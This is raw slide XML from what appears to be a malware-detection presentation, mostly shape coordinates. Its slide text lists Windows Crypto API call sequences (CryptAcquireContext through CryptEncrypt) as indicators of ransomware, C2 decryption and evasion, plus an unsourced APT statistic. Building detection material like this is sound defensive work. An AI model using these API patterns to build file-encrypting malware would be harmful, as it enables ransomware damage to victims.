              <a:path w="31750" h="635000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="635000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="63500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6" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464344" y="7915277"/>
            <a:ext cx="158750" cy="158750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="158750" h="158750">
                <a:moveTo>
                  <a:pt x="79375" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="83933" y="0"/>
                  <a:pt x="88119" y="2511"/>
                  <a:pt x="90289" y="6511"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157262" y="130535"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="159339" y="134379"/>
                  <a:pt x="159246" y="139030"/>
                  <a:pt x="157014" y="142782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="154781" y="146534"/>
                  <a:pt x="150719" y="148828"/>
                  <a:pt x="146348" y="148828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12402" y="148828"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8031" y="148828"/>
                  <a:pt x="4000" y="146534"/>
                  <a:pt x="1736" y="142782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-527" y="139030"/>
                  <a:pt x="-589" y="134379"/>
                  <a:pt x="1488" y="130535"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68461" y="6511"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70631" y="2511"/>
                  <a:pt x="74817" y="0"/>
                  <a:pt x="79375" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="79375" y="52090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="75251" y="52090"/>
                  <a:pt x="71934" y="55407"/>
                  <a:pt x="71934" y="59531"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71934" y="94258"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71934" y="98382"/>
                  <a:pt x="75251" y="101699"/>
                  <a:pt x="79375" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83499" y="101699"/>
                  <a:pt x="86816" y="98382"/>
                  <a:pt x="86816" y="94258"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86816" y="59531"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="86816" y="55407"/>
                  <a:pt x="83499" y="52090"/>
                  <a:pt x="79375" y="52090"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="87654" y="119062"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="87842" y="115990"/>
                  <a:pt x="86309" y="113066"/>
                  <a:pt x="83675" y="111473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81041" y="109879"/>
                  <a:pt x="77740" y="109879"/>
                  <a:pt x="75106" y="111473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72472" y="113066"/>
                  <a:pt x="70939" y="115990"/>
                  <a:pt x="71127" y="119062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70939" y="122135"/>
                  <a:pt x="72472" y="125059"/>
                  <a:pt x="75106" y="126652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77740" y="128246"/>
                  <a:pt x="81041" y="128246"/>
                  <a:pt x="83675" y="126652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86309" y="125059"/>
                  <a:pt x="87842" y="122135"/>
                  <a:pt x="87654" y="119062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7" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738188" y="7772402"/>
            <a:ext cx="6238875" cy="2222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2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Sophistication Indicator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125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CRITICAL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738188" y="8026402"/>
            <a:ext cx="6230938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00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Multi-layer evasion indicates professionally-developed malware. 92% of APTs implement 3+ evasion techniques.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4419" y="389860"/>
            <a:ext cx="70884" cy="567070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="70884" h="567070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70884" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70884" y="567070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="567070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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567070" y="354419"/>
            <a:ext cx="3712535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kern="0" spc="112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Category 05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67070" y="637953"/>
            <a:ext cx="3801140" cy="354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12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Cryptographic Operations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67070" y="1134140"/>
            <a:ext cx="11350256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6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Encryption and decryption patterns indicating ransomware, secure C2 communications, or payload obfuscation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72140" y="1524000"/>
            <a:ext cx="6787116" cy="2197395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6787116" h="2197395">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6787116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6787116" y="2197395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2197395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372140" y="1524000"/>
            <a:ext cx="35442" cy="2197395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35442" h="2197395">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35442" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35442" y="2197395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2197395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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567070" y="1701209"/>
            <a:ext cx="425302" cy="425302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="425302" h="425302">
                <a:moveTo>
                  <a:pt x="35440" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="389862" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="409422" y="0"/>
                  <a:pt x="425302" y="15880"/>
                  <a:pt x="425302" y="35440"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="425302" y="389862"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="425302" y="409422"/>
                  <a:pt x="409422" y="425302"/>
                  <a:pt x="389862" y="425302"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35440" y="425302"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15880" y="425302"/>
                  <a:pt x="0" y="409422"/>
                  <a:pt x="0" y="389862"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35440"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15880"/>
                  <a:pt x="15880" y="0"/>
                  <a:pt x="35440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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699977" y="1807535"/>
            <a:ext cx="159488" cy="212651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="159488" h="212651">
                <a:moveTo>
                  <a:pt x="53163" y="39872"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="53163" y="66453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106326" y="66453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106326" y="39872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106326" y="25211"/>
                  <a:pt x="94405" y="13291"/>
                  <a:pt x="79744" y="13291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65083" y="13291"/>
                  <a:pt x="53163" y="25211"/>
                  <a:pt x="53163" y="39872"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="26581" y="66453"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26581" y="39872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26581" y="10508"/>
                  <a:pt x="50380" y="-13291"/>
                  <a:pt x="79744" y="-13291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109108" y="-13291"/>
                  <a:pt x="132907" y="10508"/>
                  <a:pt x="132907" y="39872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="132907" y="66453"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="147568" y="66453"/>
                  <a:pt x="159488" y="78374"/>
                  <a:pt x="159488" y="93035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="159488" y="186070"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="159488" y="200731"/>
                  <a:pt x="147568" y="212651"/>
                  <a:pt x="132907" y="212651"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="26581" y="212651"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11920" y="212651"/>
                  <a:pt x="0" y="200731"/>
                  <a:pt x="0" y="186070"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="93035"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="78374"/>
                  <a:pt x="11920" y="66453"/>
                  <a:pt x="26581" y="6645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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134140" y="1701209"/>
            <a:ext cx="5936512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Windows Crypto API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134140" y="2020186"/>
            <a:ext cx="2870791" cy="779721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2870791" h="779721">
                <a:moveTo>
                  <a:pt x="35438" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2835352" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2854924" y="0"/>
                  <a:pt x="2870791" y="15866"/>
                  <a:pt x="2870791" y="35438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2870791" y="744283"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2870791" y="763855"/>
                  <a:pt x="2854924" y="779721"/>
                  <a:pt x="2835352" y="779721"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35438" y="779721"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15866" y="779721"/>
                  <a:pt x="0" y="763855"/>
                  <a:pt x="0" y="744283"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15879"/>
                  <a:pt x="15879" y="0"/>
                  <a:pt x="35438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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240465" y="2126512"/>
            <a:ext cx="2720163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CryptEncrypt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240465" y="2339163"/>
            <a:ext cx="2720163" cy="3544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Encrypts data using symmetric/asymmetric algorithms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4111256" y="2020186"/>
            <a:ext cx="2870791" cy="779721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2870791" h="779721">
                <a:moveTo>
                  <a:pt x="35438" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2835352" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2854924" y="0"/>
                  <a:pt x="2870791" y="15866"/>
                  <a:pt x="2870791" y="35438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2870791" y="744283"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2870791" y="763855"/>
                  <a:pt x="2854924" y="779721"/>
                  <a:pt x="2835352" y="779721"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35438" y="779721"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15866" y="779721"/>
                  <a:pt x="0" y="763855"/>
                  <a:pt x="0" y="744283"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15879"/>
                  <a:pt x="15879" y="0"/>
                  <a:pt x="35438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5" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4217581" y="2126512"/>
            <a:ext cx="2720163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CryptDecrypt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4217581" y="2339163"/>
            <a:ext cx="2720163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Decrypts protected data and C2 communications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34140" y="2906233"/>
            <a:ext cx="5918791" cy="6379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Windows Crypto API provides legitimate cryptographic functions. However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116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context determines malicious intent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116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- encryption of user files indicates ransomware, while decryption of C2 traffic suggests bot activity.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72140" y="3863163"/>
            <a:ext cx="3313814" cy="2923953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3313814" h="2923953">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3313814" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313814" y="2923953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2923953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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372140" y="3863163"/>
            <a:ext cx="35442" cy="2923953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35442" h="2923953">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35442" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35442" y="2923953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2923953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0" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531628" y="4004930"/>
            <a:ext cx="354419" cy="354419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="354419" h="354419">
                <a:moveTo>
                  <a:pt x="35442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="318977" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="338551" y="0"/>
                  <a:pt x="354419" y="15868"/>
                  <a:pt x="354419" y="35442"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="354419" y="318977"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="354419" y="338551"/>
                  <a:pt x="338551" y="354419"/>
                  <a:pt x="318977" y="354419"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35442" y="354419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="354419"/>
                  <a:pt x="0" y="338551"/>
                  <a:pt x="0" y="318977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1" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620233" y="4093535"/>
            <a:ext cx="177209" cy="177209"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="177209" h="177209">
                <a:moveTo>
                  <a:pt x="116294" y="121831"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="149936" y="121831"/>
                  <a:pt x="177209" y="94558"/>
                  <a:pt x="177209" y="60916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177209" y="27274"/>
                  <a:pt x="149936" y="0"/>
                  <a:pt x="116294" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82652" y="0"/>
                  <a:pt x="55378" y="27274"/>
                  <a:pt x="55378" y="60916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55378" y="67388"/>
                  <a:pt x="56382" y="73653"/>
                  <a:pt x="58251" y="79502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2423" y="135330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="865" y="136887"/>
                  <a:pt x="0" y="138999"/>
                  <a:pt x="0" y="141214"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="168903"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="173506"/>
                  <a:pt x="3703" y="177209"/>
                  <a:pt x="8307" y="177209"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35996" y="177209"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="40599" y="177209"/>
                  <a:pt x="44302" y="173506"/>
                  <a:pt x="44302" y="168903"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="155058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58147" y="155058"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62750" y="155058"/>
                  <a:pt x="66453" y="151355"/>
                  <a:pt x="66453" y="146751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66453" y="132907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80298" y="132907"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82513" y="132907"/>
                  <a:pt x="84624" y="132042"/>
                  <a:pt x="86182" y="130484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97707" y="118959"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="103557" y="120828"/>
                  <a:pt x="109821" y="121831"/>
                  <a:pt x="116294" y="121831"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="130138" y="33227"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="137779" y="33227"/>
                  <a:pt x="143983" y="39430"/>
                  <a:pt x="143983" y="47071"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143983" y="54712"/>
                  <a:pt x="137779" y="60916"/>
                  <a:pt x="130138" y="60916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122497" y="60916"/>
                  <a:pt x="116294" y="54712"/>
                  <a:pt x="116294" y="47071"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116294" y="39430"/>
                  <a:pt x="122497" y="33227"/>
                  <a:pt x="130138" y="33227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Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992372" y="4058093"/>
            <a:ext cx="1515140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AES Implementation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31628" y="4465674"/>
            <a:ext cx="3012558" cy="1435395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3012558" h="1435395">
                <a:moveTo>
                  <a:pt x="35440" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2977118" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2996691" y="0"/>
                  <a:pt x="3012558" y="15867"/>
                  <a:pt x="3012558" y="35440"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3012558" y="1399955"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3012558" y="1419528"/>
                  <a:pt x="2996691" y="1435395"/>
                  <a:pt x="2977118" y="1435395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35440" y="1435395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15867" y="1435395"/>
                  <a:pt x="0" y="1419528"/>
                  <a:pt x="0" y="1399955"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35440"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15867"/>
                  <a:pt x="15867" y="0"/>
                  <a:pt x="3544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Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637953" y="4572000"/>
            <a:ext cx="2861930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AES Encryption Pattern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37953" y="4784651"/>
            <a:ext cx="2861930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CryptAcquireContext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37953" y="4961860"/>
            <a:ext cx="2861930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CryptCreateHash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37953" y="5139070"/>
            <a:ext cx="2861930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CryptDeriveKey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7953" y="5316279"/>
            <a:ext cx="2861930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CryptEncrypt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31628" y="6009610"/>
            <a:ext cx="3083442" cy="6379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Symmetric encryption for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116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 file encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116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ransomware operations. Key derivation from passwords enables secure data protection.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845442" y="3863163"/>
            <a:ext cx="3313814" cy="2923953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3313814" h="2923953">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3313814" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313814" y="2923953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2923953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1" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3845442" y="3863163"/>
            <a:ext cx="35442" cy="2923953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35442" h="2923953">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35442" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35442" y="2923953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2923953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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004930" y="4004930"/>
            <a:ext cx="354419" cy="354419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="354419" h="354419">
                <a:moveTo>
                  <a:pt x="35442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="318977" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="338551" y="0"/>
                  <a:pt x="354419" y="15868"/>
                  <a:pt x="354419" y="35442"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="354419" y="318977"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="354419" y="338551"/>
                  <a:pt x="338551" y="354419"/>
                  <a:pt x="318977" y="354419"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35442" y="354419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="354419"/>
                  <a:pt x="0" y="338551"/>
                  <a:pt x="0" y="318977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3" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4082459" y="4093535"/>
            <a:ext cx="199360" cy="177209"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="199360" h="177209">
                <a:moveTo>
                  <a:pt x="82790" y="-2769"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="80679" y="-4915"/>
                  <a:pt x="77598" y="-5780"/>
                  <a:pt x="74691" y="-4984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71784" y="-4188"/>
                  <a:pt x="69534" y="-1938"/>
                  <a:pt x="68807" y="969"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63512" y="21805"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63131" y="23328"/>
                  <a:pt x="61573" y="24228"/>
                  <a:pt x="60085" y="23778"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="39388" y="17963"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36480" y="17133"/>
                  <a:pt x="33365" y="17963"/>
                  <a:pt x="31254" y="20074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29143" y="22186"/>
                  <a:pt x="28312" y="25301"/>
                  <a:pt x="29143" y="28208"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34992" y="48906"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35407" y="50394"/>
                  <a:pt x="34507" y="51951"/>
                  <a:pt x="33019" y="52332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12149" y="57628"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9241" y="58354"/>
                  <a:pt x="6957" y="60639"/>
                  <a:pt x="6161" y="63546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5365" y="66453"/>
                  <a:pt x="6230" y="69534"/>
                  <a:pt x="8376" y="71645"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="23778" y="86632"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24885" y="87705"/>
                  <a:pt x="24885" y="89505"/>
                  <a:pt x="23778" y="90612"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8411" y="105599"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6265" y="107710"/>
                  <a:pt x="5399" y="110790"/>
                  <a:pt x="6195" y="113698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6991" y="116605"/>
                  <a:pt x="9276" y="118855"/>
                  <a:pt x="12183" y="119616"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33019" y="124912"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34542" y="125293"/>
                  <a:pt x="35442" y="126850"/>
                  <a:pt x="34992" y="128338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29143" y="149001"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28312" y="151909"/>
                  <a:pt x="29143" y="155024"/>
                  <a:pt x="31254" y="157135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33365" y="159246"/>
                  <a:pt x="36480" y="160077"/>
                  <a:pt x="39388" y="159246"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60085" y="153397"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="61573" y="152981"/>
                  <a:pt x="63131" y="153881"/>
                  <a:pt x="63512" y="155370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68807" y="176206"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="69534" y="179113"/>
                  <a:pt x="71818" y="181397"/>
                  <a:pt x="74726" y="182193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
